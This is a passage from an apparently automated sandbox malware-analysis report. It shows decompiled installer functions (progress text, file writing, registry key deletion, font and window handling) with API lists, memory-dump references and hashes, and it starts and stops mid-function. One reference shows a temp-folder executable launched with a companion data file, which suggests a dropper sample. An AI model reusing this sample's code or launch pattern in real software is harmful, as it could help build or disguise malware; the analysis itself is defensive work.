                                                          						_t19 = L"verifying installer: %d%%";
                                                          					}
                                                          					wsprintfW( &_v132, _t19, _t11);
                                                          					SetWindowTextW(_a4,  &_v132);
                                                          					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                          				}
                                                          				return 0;
                                                          			}






                                                          0x00402fa3
                                                          0x00402fb1
                                                          0x00402fb7
                                                          0x00402fb7
                                                          0x00402fc5
                                                          0x00402fc7
                                                          0x00402fd3
                                                          0x00402fd8
                                                          0x00402fda
                                                          0x00402fda
                                                          0x00402fe5
                                                          0x00402ff5
                                                          0x00403007
                                                          0x00403007
                                                          0x0040300f

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                          • API String ID: 1451636040-1158693248
                                                          • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                          • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                          • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                          • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E00402950(void* __ebx) {
                                                          				WCHAR* _t26;
                                                          				void* _t29;
                                                          				long _t37;
                                                          				void* _t49;
                                                          				void* _t52;
                                                          				void* _t54;
                                                          				void* _t56;
                                                          				void* _t59;
                                                          				void* _t60;
                                                          				void* _t61;
                                                          
                                                          				_t49 = __ebx;
                                                          				_t52 = 0xfffffd66;
                                                          				_t26 = E00402DA6(0xfffffff0);
                                                          				_t55 = _t26;
                                                          				 *(_t61 - 0x40) = _t26;
                                                          				if(E00405FAE(_t26) == 0) {
                                                          					E00402DA6(0xffffffed);
                                                          				}
                                                          				E00406133(_t55);
                                                          				_t29 = E00406158(_t55, 0x40000000, 2);
                                                          				 *(_t61 + 8) = _t29;
                                                          				if(_t29 != 0xffffffff) {
                                                          					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                          					if( *(_t61 - 0x28) != _t49) {
                                                          						_t37 =  *0x42a274;
                                                          						 *(_t61 - 0x44) = _t37;
                                                          						_t54 = GlobalAlloc(0x40, _t37);
                                                          						if(_t54 != _t49) {
                                                          							E004035F8(_t49);
                                                          							E004035E2(_t54,  *(_t61 - 0x44));
                                                          							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                          							 *(_t61 - 0x10) = _t59;
                                                          							if(_t59 != _t49) {
                                                          								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                          								while( *_t59 != _t49) {
                                                          									_t51 =  *_t59;
                                                          									_t60 = _t59 + 8;
                                                          									 *(_t61 - 0x3c) =  *_t59;
                                                          									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                          									_t59 = _t60 +  *(_t61 - 0x3c);
                                                          								}
                                                          								GlobalFree( *(_t61 - 0x10));
                                                          							}
                                                          							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                          							GlobalFree(_t54);
                                                          							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                          						}
                                                          					}
                                                          					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                          					CloseHandle( *(_t61 + 8));
                                                          				}
                                                          				_t56 = 0xfffffff3;
                                                          				if(_t52 < _t49) {
                                                          					_t56 = 0xffffffef;
                                                          					DeleteFileW( *(_t61 - 0x40));
                                                          					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                          				}
                                                          				_push(_t56);
                                                          				E00401423();
                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
                                                          				return 0;
                                                          			}













                                                          0x00402950
                                                          0x00402952
                                                          0x00402957
                                                          0x0040295c
                                                          0x0040295f
                                                          0x00402969
                                                          0x0040296d
                                                          0x0040296d
                                                          0x00402973
                                                          0x00402980
                                                          0x00402988
                                                          0x0040298b
                                                          0x00402997
                                                          0x0040299a
                                                          0x004029a0
                                                          0x004029ae
                                                          0x004029b3
                                                          0x004029b7
                                                          0x004029ba
                                                          0x004029c3
                                                          0x004029cf
                                                          0x004029d3
                                                          0x004029d6
                                                          0x004029e0
                                                          0x004029ff
                                                          0x004029e7
                                                          0x004029ec
                                                          0x004029f4
                                                          0x004029f7
                                                          0x004029fc
                                                          0x004029fc
                                                          0x00402a06
                                                          0x00402a06
                                                          0x00402a13
                                                          0x00402a19
                                                          0x00402a1f
                                                          0x00402a1f
                                                          0x004029b7
                                                          0x00402a33
                                                          0x00402a35
                                                          0x00402a35
                                                          0x00402a3f
                                                          0x00402a40
                                                          0x00402a44
                                                          0x00402a48
                                                          0x00402a4e
                                                          0x00402a4e
                                                          0x00402a55
                                                          0x004022f1
                                                          0x00402c2d
                                                          0x00402c39

                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                          • GlobalFree.KERNEL32 ref: 00402A06
                                                          • GlobalFree.KERNEL32 ref: 00402A19
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
                                                          • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                          • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                          • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                          • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                          				char _v68;
                                                          				char _v132;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t23;
                                                          				signed int _t24;
                                                          				void* _t31;
                                                          				void* _t33;
                                                          				void* _t34;
                                                          				void* _t44;
                                                          				signed int _t46;
                                                          				signed int _t50;
                                                          				signed int _t52;
                                                          				signed int _t53;
                                                          				signed int _t55;
                                                          
                                                          				_t23 = _a16;
                                                          				_t53 = _a12;
                                                          				_t44 = 0xffffffdc;
                                                          				if(_t23 == 0) {
                                                          					_push(0x14);
                                                          					_pop(0);
                                                          					_t24 = _t53;
                                                          					if(_t53 < 0x100000) {
                                                          						_push(0xa);
                                                          						_pop(0);
                                                          						_t44 = 0xffffffdd;
                                                          					}
                                                          					if(_t53 < 0x400) {
                                                          						_t44 = 0xffffffde;
                                                          					}
                                                          					if(_t53 < 0xffff3333) {
                                                          						_t52 = 0x14;
                                                          						asm("cdq");
                                                          						_t24 = 1 / _t52 + _t53;
                                                          					}
                                                          					_t25 = _t24 & 0x00ffffff;
                                                          					_t55 = _t24 >> 0;
                                                          					_t46 = 0xa;
                                                          					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                          				} else {
                                                          					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                          					_t50 = 0;
                                                          				}
                                                          				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                          				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
                                                          				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
                                                          				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                          				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
                                                          			}



















                                                          0x00404e7a
                                                          0x00404e7f
                                                          0x00404e87
                                                          0x00404e88
                                                          0x00404e95
                                                          0x00404e9d
                                                          0x00404e9e
                                                          0x00404ea0
                                                          0x00404ea2
                                                          0x00404ea4
                                                          0x00404ea7
                                                          0x00404ea7
                                                          0x00404eae
                                                          0x00404eb4
                                                          0x00404eb4
                                                          0x00404ebb
                                                          0x00404ec2
                                                          0x00404ec5
                                                          0x00404ec8
                                                          0x00404ec8
                                                          0x00404ecc
                                                          0x00404edc
                                                          0x00404ede
                                                          0x00404ee1
                                                          0x00404e8a
                                                          0x00404e8a
                                                          0x00404e91
                                                          0x00404e91
                                                          0x00404ee9
                                                          0x00404ef4
                                                          0x00404f0a
                                                          0x00404f1b
                                                          0x00404f37

                                                          APIs
                                                          • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                          • wsprintfW.USER32 ref: 00404F1B
                                                          • SetDlgItemTextW.USER32 ref: 00404F2E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s$H7B
                                                          • API String ID: 3540041739-107966168
                                                          • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                          • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                          • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                          • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 48%
                                                          			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                          				void* _v8;
                                                          				int _v12;
                                                          				short _v536;
                                                          				void* _t27;
                                                          				signed int _t33;
                                                          				intOrPtr* _t35;
                                                          				signed int _t45;
                                                          				signed int _t46;
                                                          				signed int _t47;
                                                          
                                                          				_t46 = _a12;
                                                          				_t47 = _t46 & 0x00000300;
                                                          				_t45 = _t46 & 0x00000001;
                                                          				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                          				if(_t27 == 0) {
                                                          					if((_a12 & 0x00000002) == 0) {
                                                          						L3:
                                                          						_push(0x105);
                                                          						_push( &_v536);
                                                          						_push(0);
                                                          						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                          							__eflags = _t45;
                                                          							if(__eflags != 0) {
                                                          								L10:
                                                          								RegCloseKey(_v8);
                                                          								return 0x3eb;
                                                          							}
                                                          							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                          							__eflags = _t33;
                                                          							if(_t33 != 0) {
                                                          								break;
                                                          							}
                                                          							_push(0x105);
                                                          							_push( &_v536);
                                                          							_push(_t45);
                                                          						}
                                                          						RegCloseKey(_v8);
                                                          						_t35 = E00406A35(3);
                                                          						if(_t35 != 0) {
                                                          							return  *_t35(_a4, _a8, _t47, 0);
                                                          						}
                                                          						return RegDeleteKeyW(_a4, _a8);
                                                          					}
                                                          					_v12 = 0;
                                                          					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                          						goto L10;
                                                          					}
                                                          					goto L3;
                                                          				}
                                                          				return _t27;
                                                          			}












                                                          0x00402eb4
                                                          0x00402ebd
                                                          0x00402ec6
                                                          0x00402ed2
                                                          0x00402edb
                                                          0x00402ee5
                                                          0x00402f0a
                                                          0x00402f10
                                                          0x00402f15
                                                          0x00402f16
                                                          0x00402f46
                                                          0x00402f1f
                                                          0x00402f21
                                                          0x00402f71
                                                          0x00402f74
                                                          0x00000000
                                                          0x00402f7a
                                                          0x00402f30
                                                          0x00402f35
                                                          0x00402f37
                                                          0x00000000
                                                          0x00000000
                                                          0x00402f3f
                                                          0x00402f44
                                                          0x00402f45
                                                          0x00402f45
                                                          0x00402f52
                                                          0x00402f5a
                                                          0x00402f61
                                                          0x00000000
                                                          0x00402f8a
                                                          0x00000000
                                                          0x00402f69
                                                          0x00402ef5
                                                          0x00402f08
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402f08
                                                          0x00402f90

                                                          APIs
                                                          • RegEnumValueW.ADVAPI32 ref: 00402EFD
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: CloseEnum$DeleteValue
                                                          • String ID:
                                                          • API String ID: 1354259210-0
                                                          • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                          • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                          • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                          • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E00401D81(void* __ebx, void* __edx) {
                                                          				struct HWND__* _t30;
                                                          				WCHAR* _t38;
                                                          				void* _t48;
                                                          				void* _t53;
                                                          				signed int _t55;
                                                          				signed int _t60;
                                                          				long _t63;
                                                          				void* _t65;
                                                          
                                                          				_t53 = __ebx;
                                                          				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                          					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                          				} else {
                                                          					E00402D84(2);
                                                          					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                          				}
                                                          				_t55 =  *(_t65 - 0x24);
                                                          				 *(_t65 + 8) = _t30;
                                                          				_t60 = _t55 & 0x00000004;
                                                          				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                          				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                          				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                          				if((_t55 & 0x00010000) == 0) {
                                                          					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                          				} else {
                                                          					_t38 = E00402DA6(0x11);
                                                          				}
                                                          				 *(_t65 - 0x44) = _t38;
                                                          				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                          				asm("sbb esi, esi");
                                                          				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                          				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                          				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                          					DeleteObject(_t48);
                                                          				}
                                                          				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                          					_push(_t63);
                                                          					E004065AF();
                                                          				}
                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
                                                          				return 0;
                                                          			}











                                                          0x00401d81
                                                          0x00401d85
                                                          0x00401d9a
                                                          0x00401d87
                                                          0x00401d89
                                                          0x00401d8f
                                                          0x00401d8f
                                                          0x00401da0
                                                          0x00401da3
                                                          0x00401dad
                                                          0x00401db0
                                                          0x00401db8
                                                          0x00401dc9
                                                          0x00401dcc
                                                          0x00401dd7
                                                          0x00401dce
                                                          0x00401dd0
                                                          0x00401dd0
                                                          0x00401ddb
                                                          0x00401de5
                                                          0x00401e0c
                                                          0x00401e1b
                                                          0x00401e29
                                                          0x00401e31
                                                          0x00401e39
                                                          0x00401e39
                                                          0x00401e42
                                                          0x00401e48
                                                          0x00402ba4
                                                          0x00402ba4
                                                          0x00402c2d
                                                          0x00402c39

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                          • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                          • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                          • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 73%
                                                          			E00401E4E(intOrPtr __edx) {
                                                          				void* __edi;
                                                          				int _t9;
                                                          				signed char _t15;
                                                          				struct HFONT__* _t18;
                                                          				intOrPtr _t30;
                                                          				void* _t31;
                                                          				struct HDC__* _t33;
                                                          				void* _t35;
                                                          
                                                          				_t30 = __edx;
                                                          				_t33 = GetDC( *(_t35 - 8));
                                                          				_t9 = E00402D84(2);
                                                          				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                          				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                          				ReleaseDC( *(_t35 - 8), _t33);
                                                          				 *0x40ce08 = E00402D84(3);
                                                          				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                          				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                          				 *0x40ce0f = 1;
                                                          				 *0x40ce0c = _t15 & 0x00000001;
                                                          				 *0x40ce0d = _t15 & 0x00000002;
                                                          				 *0x40ce0e = _t15 & 0x00000004;
                                                          				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
                                                          				_t18 = CreateFontIndirectW(0x40cdf8);
                                                          				_push(_t18);
                                                          				_push(_t31);
                                                          				E004065AF();
                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                                          				return 0;
                                                          			}











                                                          0x00401e4e
                                                          0x00401e59
                                                          0x00401e5b
                                                          0x00401e68
                                                          0x00401e7f
                                                          0x00401e84
                                                          0x00401e91
                                                          0x00401e96
                                                          0x00401e9a
                                                          0x00401ea5
                                                          0x00401eac
                                                          0x00401ebe
                                                          0x00401ec4
                                                          0x00401ec9
                                                          0x00401ed3
                                                          0x00402638
                                                          0x0040156d
                                                          0x00402ba4
                                                          0x00402c2d
                                                          0x00402c39

                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401E51
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                          • ReleaseDC.USER32 ref: 00401E84
                                                            • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                            • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                          • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                          • String ID:
                                                          • API String ID: 2584051700-0
                                                          • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                          • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                          • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                          • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 59%
                                                          			E00401C43(intOrPtr __edx) {
                                                          				int _t29;
                                                          				long _t30;
                                                          				signed int _t32;
                                                          				WCHAR* _t35;
                                                          				long _t36;
                                                          				int _t41;
                                                          				signed int _t42;
                                                          				int _t46;
                                                          				int _t56;
                                                          				intOrPtr _t57;
                                                          				struct HWND__* _t63;
                                                          				void* _t64;
                                                          
                                                          				_t57 = __edx;
                                                          				_t29 = E00402D84(3);
                                                          				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                          				 *(_t64 - 0x18) = _t29;
                                                          				_t30 = E00402D84(4);
                                                          				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                          				 *(_t64 + 8) = _t30;
                                                          				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                          					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                          				}
                                                          				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                          				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                          					 *(_t64 + 8) = E00402DA6(0x44);
                                                          				}
                                                          				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                          				_push(1);
                                                          				if(__eflags != 0) {
                                                          					_t61 = E00402DA6();
                                                          					_t32 = E00402DA6();
                                                          					asm("sbb ecx, ecx");
                                                          					asm("sbb eax, eax");
                                                          					_t35 =  ~( *_t31) & _t61;
                                                          					__eflags = _t35;
                                                          					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                          					goto L10;
                                                          				} else {
                                                          					_t63 = E00402D84();
                                                          					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                          					_t41 = E00402D84(2);
                                                          					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                          					_t56 =  *(_t64 - 0x1c) >> 2;
                                                          					if(__eflags == 0) {
                                                          						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                          						L10:
                                                          						 *(_t64 - 0x38) = _t36;
                                                          					} else {
                                                          						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                          						asm("sbb eax, eax");
                                                          						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                          					}
                                                          				}
                                                          				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
